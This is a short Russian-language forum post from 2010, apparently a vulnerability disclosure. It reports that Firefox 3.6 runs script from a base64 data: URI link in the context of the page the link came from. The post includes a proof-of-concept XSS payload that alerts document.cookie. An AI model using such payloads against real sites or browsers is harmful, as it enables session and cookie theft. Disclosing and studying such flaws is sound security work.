Старый 03.08.2010, 05:56   #1
tipsy
 
Аватар для tipsy
 
Регистрация: 11.07.2010
Сообщений: 415
Репутация: 311
По умолчанию Firefox 3.6: data URI context handling error

Firefox 3.6.* (latest stable) при переходе по ссылке вида
Код HTML:
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==">link</a>
Код:
<script>alert(document.cookie);</script>
выполняет скрипты в контексте документа, с которого выполнялся переход

Пример:



tipsy вне форума   Ответить с цитированием
Ответ

Метки
data:, firefox, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot